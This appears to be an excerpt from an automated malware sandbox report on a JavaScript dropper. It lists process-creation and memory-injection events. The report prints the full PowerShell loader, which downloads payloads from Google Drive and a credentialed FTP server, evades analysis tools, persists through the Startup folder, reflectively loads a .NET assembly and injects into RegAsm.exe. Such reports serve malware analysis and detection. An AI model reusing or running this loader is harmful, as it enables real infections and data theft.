Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BD4008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E68008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FC4008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 102E008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1101008

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 +	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv \| Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz \| Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg \| Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $jphaa = 'ja' + [char]66 + '2ahgayg' + [char]66 + 'dahgaiaa9acaaja' + [char]66 + 'oag8acw' + [char]66 + '0ac4avg' + [char]66 + 'lahiacw' + [char]66 + 'pag8abgauae0ayq' + [char]66 + 'qag8acgauaeuacq' + [char]66 + '1ageaba' + [char]66 + 'zacgamgapadsasq' + [char]66 + 'macaakaagacqadg' + [char]66 + '4agiaqw' + [char]66 + '4acaakqagahsaja' + [char]66 + 'iahoatw' + [char]66 + 'nagoaiaa9acaaww' + [char]66 + 'tahkacw' + [char]66 + '0aguabqauaekatwauafaayq' + [char]66 + '0aggaxqa6adoarw' + [char]66 + 'lahqava' + [char]66 + 'lag0aca' + [char]66 + 'qageada' + [char]66 + 'oacgakqa7agqazq' + [char]66 + 'sacaakaakaegaeg' + [char]66 + 'pae0aagagacsaiaanafwavq' + [char]66 + 'wahcaaq' + [char]66 + 'uac4abq' + [char]66 + 'zahuajwapadsaja' + [char]66 + 'qagsadw' + [char]66 + 'qahoaiaa9acaajw' + [char]66 + 'oahqada' + [char]66 + 'wahmaogavac8aza' + [char]66 + 'yagkadg' + [char]66 + 'lac4azw' + [char]66 + 'vag8azw' + [char]66 + 'sagualg' + [char]66 + 'jag8abqavahuaywa/aguaea' + [char]66 + 'wag8acg' + [char]66 + '0ad0aza' + [char]66 + 'vahcabg' + [char]66 + 'sag8ayq' + [char]66 + 'kacyaaq' + [char]66 + 'kad0ajwa7acqaua' + [char]66 + 'pafuauq' + [char]66 + 'iacaapqagacqazq' + [char]66 + 'uahyaog' + [char]66 + 'qafiatw' + [char]66 + 'daeuauw' + [char]66 + 'tae8aug' + [char]66 + 'faeeaug' + [char]66 + 'daegasq' + [char]66 + 'uaeuaqw' + [char]66 + 'uafuaug' + [char]66 + 'fac4aqw' + [char]66 + 'vag4ada' + [char]66 + 'hagkabg' + [char]66 + 'zacgajwa2adqajwapadsaaq' + [char]66 + 'macaakaagacqaua' + [char]66 + 'pafuauq' + [char]66 + 'iacaakqagahsaja' + [char]66 + 'qagsadw' + [char]66 + 'qahoaiaa9acaakaakagoaaw' + [char]66 + '3agoaegagacsaiaanadeacaayagiacg' + [char]66 + 'qaegalq' + [char]66 + 'rae4awqa1agiacg' + [char]66 + '3agkata' + [char]66 + 'aahuawq' + [char]66 + 'zafcalq' + [char]66 + 'saduaoq' + [char]66 + 'vahcaag' + [char]66 + 'kafmarq' + [char]66 + 'waccakqagadsafq' + [char]66 + 'lagwacw' + [char]66 + 'lacaaewakagoaaw' + [char]66 + '3agoaegagad0aiaaoacqaag' + [char]66 + 'rahcaag' + [char]66 + '6acaakwagaccamq' + [char]66 + 'hageasa' + [char]66 + '5adqalq' + [char]66 + 'caewamq' + [char]66 + 'qahaaqq' + [char]66 + 'uagoaaa' + [char]66 + '0aguazwa4adgasw' + [char]66 + 'nafoanw' + [char]66 + 'jahuaoaaxafoamaa1ahcajwapacaaow' + [char]66 + '9adsaja' + [char]66 + 'jahgaca' + [char]66 + 'magqaiaa9acaakaagae4azq' + [char]66 + '3ac0atw' + [char]66 + 'iagoazq' + [char]66 + 'jahqaia' + [char]66 + 'oaguadaauafcazq' + [char]66 + 'iaemaba' + [char]66 + 'paguabg' + [char]66 + '0acaakqagadsaja' + [char]66 + 'jahgaca' + [char]66 + 'magqalg' + [char]66 + 'fag4ayw' + [char]66 + 'vagqaaq' + [char]66 + 'uagcaiaa9acaaww' + [char]66 + 'tahkacw' + [char]66 + '0aguabqauafqazq' + [char]66 + '4ahqalg' + [char]66 + 'fag4ayw' + [char]66 + 'vagqaaq' + [char]66 + 'uagcaxqa6adoavq' + [char]66 + 'uaeyaoaagadsaja' + [char]66 + 'jahgaca' + [char]66 + 'magqalg' + [char]66 +
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vxbcx = $host.version.major.equals(2);if ( $vxbcx ) {$hzomj = [system.io.path]::gettemppath();del ($hzomj + '\upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$piuqb = $env:processor_architecture.contains('64');if ( $piuqb ) {$jkwjz = ($jkwjz + '1p2brjh-qny5brwilzuysw-r59uwjdsev') ;}else {$jkwjz = ($jkwjz + '1aahy4-bl1jpanjhteg88kmz7cu81z05w') ;};$cxpfd = ( new-object net.webclient ) ;$cxpfd.encoding = [system.text.encoding]::utf8 ;$cxpfd.downloadfile($jkwjz, ($hzomj + '\upwin.msu') ) ;$tpwkf = ( 'c:\users\' + [environment]::username );hhxhb = ( $hzomj + '\upwin.msu' ) ; powershell.exe wusa.exe hhxhb /quiet /norestart ; copy-item 'c:\users\user\desktop\devis_valide.js' -destination ( $tpwkf + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true} ;[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12 ;if((get-process 'wireshark','apatedns','analyze' -ea silentlycontinue) -eq $null){ } else{ restart-computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter' + '/02/dll01.txt' );$iepgq = ( [system.io.path]::gettemppath() + 'dll01.txt');$ojrrp = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllgq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webclient = new-object system.net.webclient ;$webclient.credentials = new-object system.net.networkcredential($ojrrp, $lllgq) ;$rvuxv = $webclient.downloadstring( $jlcqj ) ;$rvuxv \| out-file -filepath $iepgq -encoding 'utf8' -force ;$stfgl = ( [system.io.path]::gettemppath() + 'dll02.txt') ;$phrln = new-object system.net.webclient ;$phrln.encoding = [system.text.encoding]::utf8 ;$dhzua = ( get-content -path $iepgq ) ;$utlhz = $phrln.downloadstring( $dhzua ) ;$utlhz \| out-file -filepath $stfgl -force ;$modrg = '$ryaeg = (get-content -path ' + $stfgl + ' -encoding utf8);' ;$modrg += '[byte[]] $fyfdz = [system.convert]::frombase64string( $ryaeg.replace(''?:?'',''a'') ) ;' ;$modrg += '[system.appdomain]::currentdomain.load( $fyfdz ).' ;$modrg += 'gettype( ''classlibrary3.class1'' ).getm' ;$modrg += 'ethod( ''prfvi'' ).invoke( $null , [object[]] ( ''k7nnmcpc/war/moc.nibetsap//:sptth'' , ''c:\users\user\desktop\devis_valide.js'' , ''d ddregasm'' ) );';$vbwwz = ( [system.io.path]::gettemppath() + 'dll03.ps1') ;$modrg \| out-file -filepath $vbwwz -force ;powershell -executionpolicy bypass -file $vbwwz ;};"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\iyvmd.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\ainzw.ps1'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\iyvmd.ps1'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\ainzw.ps1'
Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\locallow\daft sytem\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\jamie.ps1' ";exit
Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\locallow\daft sytem\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\jamie.ps1' ";exit
Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\locallow\daft sytem\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\jamie.ps1' ";exit
Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\locallow\daft sytem\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\jamie.ps1' ";exit
